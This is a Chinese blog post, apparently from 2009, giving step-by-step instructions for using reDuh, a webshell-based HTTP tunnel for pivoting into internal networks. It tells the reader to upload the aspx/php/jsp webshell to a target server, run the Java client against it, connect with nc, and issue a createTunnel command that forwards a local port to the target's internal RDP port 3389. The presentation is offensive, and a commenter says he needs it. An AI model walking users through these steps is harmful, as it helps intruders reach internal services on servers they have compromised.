内网渗透利器--reDuh(webshell跳板)简单使用说明

作者:sai52[B.H.S.T]
blog:www.sai52.com

国外大牛的作品,偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------(http隧道)-----------服务端------------------内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。

把客户端文件解包,这里我把它放到E盘的TEST文件夹

01.jpg

大小: 69.98 K
尺寸: 500 x 240
浏览: 27 次
点击打开新窗口浏览全图
图01


把服务端的webshell上传到目标服务器。

02.jpg

大小: 25.29 K
尺寸: 386 x 206
浏览: 12 次
点击打开新窗口浏览全图
图02


目标服务器在内网,开了终端服务。

03.jpg

大小: 79 K
尺寸: 500 x 414
浏览: 39 次
点击打开新窗口浏览全图
图03


命令行下用客户端连接服务端

E:\test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx

04.jpg

大小: 37.9 K
尺寸: 500 x 113
浏览: 27 次
点击打开新窗口浏览全图
图04


新开一个命令行,用NC连接本机1010端口。

H:\>nc -vv localhost 1010

05.jpg

大小: 22.51 K
尺寸: 500 x 97
浏览: 21 次
点击打开新窗口浏览全图
图05


连接成功会有欢迎提示,之后输入命令

>>[createTunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

06.jpg

大小: 30.29 K
尺寸: 500 x 122
浏览: 14 次
点击打开新窗口浏览全图
图06

07.jpg

大小: 46.97 K
尺寸: 500 x 136
浏览: 13 次
点击打开新窗口浏览全图
图07


这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

08.jpg

大小: 25.99 K
尺寸: 407 x 231
浏览: 15 次
点击打开新窗口浏览全图
图08

09.jpg

大小: 87.65 K
尺寸: 500 x 244
浏览: 13 次
点击打开新窗口浏览全图
图09


数据的传递过程

10.jpg

大小: 60.21 K
尺寸: 500 x 135
浏览: 18 次
点击打开新窗口浏览全图
图10


需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。

reDuh客户端下载  reduhclient-0.3.zip
reDuh服务端下载  reduh-server-all.gz
 

Comments (1)

Gravatar
19432009-03-13, 7:58 PM

哈哈  我正需要  谢了兄弟

Leave a comment

Your comment

Why not Login? Sign up now! »